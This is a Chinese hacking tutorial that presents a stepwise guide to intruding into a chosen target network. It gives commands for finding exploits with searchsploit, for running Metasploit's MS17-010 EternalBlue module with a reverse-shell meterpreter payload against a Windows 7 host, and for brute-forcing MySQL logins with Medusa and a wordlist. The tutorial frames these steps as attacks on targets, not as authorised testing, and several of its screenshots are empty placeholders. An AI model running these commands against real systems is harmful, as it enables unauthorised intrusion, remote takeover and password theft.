黑客协会：黑客指定目标渗透入侵攻击实战

在入侵渗透一个大型目标网络时我一般分为4个大步骤，信息搜集－扫描查点－攻击获取权限—清除日志 我看了很多网上的文章或者视频做的都不是太系统。也不太详细。所以我打算做一个系列系统的教程。花无涯带你走进黑客世界系列技术文章，此次我打算把每个步骤详细的做一次梳理与总结方便想要学习网络安全技术的同学。

收集目标的情报信息是一个非常重要的环节。可以大大提高渗透测试的成功性。收集渗透目标情报一般是对目标系统的分析，扫描探测，服务查点，查找对方系统IP等，社会工程学在渗透测试中也非常有。渗透测试者会尽力搜集目标系统的配置，whois，主机ip段，公司人员，安全防御以及防火墙等信息。

请点击此处输入图片描述

通过对前面的信息搜集，端口扫描，查点，已经掌握了足够多的信息，接下来就是攻击了。我介绍一下我在渗透时使用的一些攻击方法。

00x1Exploit-DB利用程序

通过对目标主机进行扫描探测和查点，获取到系统的版本和端口服务上装的软件版本，可以到http://exploit-db.com上查找对应获取到的版本漏洞利用程序，http://exploit-db.com中有包含各种漏洞利用程序。

可以在http://exploit-db.com的web页面进行搜索如图

请点击此处输入图片描述

1.kali searchsploit搜索

在kali下会自动加载一分包含exploit－db的数据库，使用searchsploit可以搜索漏洞利用程序

命令：root@kali:~# searchsploitssh-w -t

找到对应的漏洞利用程序后，编译后即可进行利用。

请点击此处输入图片描述

00x2Metasploit服务漏洞利用

根据获取到的系统版本或者是第三方服务器软件的版本，利用msf的漏洞库进行远程攻击获权限。

1.关于postgresql数据库设置

/usr/share/postgresql/9.4/man

sudo -u postgres psql； //进入命令行客户端

create user feige with password ‘123456789’；//创建用户

create database sec bang owner feign； //创建数据库

2.kali下Ms17-010漏洞利用

攻击者：kali ip 192.168.189.128

受害者：windows 7 ip 192.168.189.143

1.在kali启动metasploit命令：msfconsole

请点击此处输入图片描述

2.搜索ms17-010模块：search ms17-010

// 这里有很多漏洞可以利用 需要那个找那个就可以

请点击此处输入图片描述

3.进入该模块:

use exploit/windows/smb/ms17_010_eternalblue

使用上面命令进入exploit目录

4.查看该模块使用信息

请点击此处输入图片描述

4.设置目标ip和攻击者ip并且加载模块

set RHOST 192.168.189.143

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.189.128

exploit

5.反弹shell 获取目标192.168.189.143权限

请点击此处输入图片描述

请点击此处输入图片描述

注：该模块只对Windows7 2008有效

00×3系统服务暴力破解

通过附对目标服务器进行端口扫描发现主机上都运行这那些类型的远程服务。掌握了这些开放的服务后可以尝试暴力破解获取权限。 我经常使用的暴力破解工具有 Medusa 和 Hydra。我主要介绍Medusa ,

Medusa支持破解 AFP, FTP, HTTP, IMAP, MSSQL , MYSQL, Netware, NCP , NNTP , PcAnywhere, pop3, Rexec,

RLOGIN, SMTPAUTH, SNMP, SSHV2, Telnet, VNC, web from

在进行破解之前要准备一个字典，这就用到了第一章中信息搜集事获取的信息了，把员工信息ahiois等信息综合起来做一个字典定向进行暴力破解会大大提高成功率。

1.Medusa暴力破解演示

Medusa -d

//-d参数可以查看都支持暴力破解那些远程服务。

请点击此处输入图片描述

2.破解mysql

我使用kali自带的密码字典演示，自带字典位置“usr/share/wordlists/rockyou.txt”

-M：要破解的服务名称

-h : ip

-u : 用户名／用户名字典

-p ：密码字典

命令:medusa -M mysql -h 192.168.30.128 -e ns -F -u root -Prockyou.txt

执行上面命令后medusa会自动进行破解如下图，成功与否要看你的字典是否强大了。

请点击此处输入图片描述

黑客技术入门到精通书籍《网络黑白》某宝有。​每一本武功秘籍的现世，都预示着一场武林纷争，都引领着一场腥风血雨，每一把绝世好剑的铸成，都象征着一次血染长河，都伴随着众多英雄泣血。然而武侠的时代早已过去，黑客的时代正在到来。